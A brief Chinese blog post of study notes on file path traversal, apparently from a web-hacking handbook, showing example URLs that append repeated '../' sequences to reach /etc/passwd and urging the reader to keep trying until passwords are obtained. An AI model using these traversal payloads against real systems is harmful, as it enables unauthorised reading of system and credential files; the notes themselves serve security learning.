黑客攻防技术宝典 — Notes 7 文件路径遍历

Leave a Comment / Security / June 29, 2010

如果你看到一个URL这样写:

   http://hello.com/file?=hi.doc

那就可以试试看hi.doc的上层目录有没有东西

   http://hello.com/file?=../etc/passwd

   http://hello.com/file?=../../etc/passwd

   http://hello.com/file?=../../../etc/passwd

直到你拿到密码为止

   

Leave a Comment

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.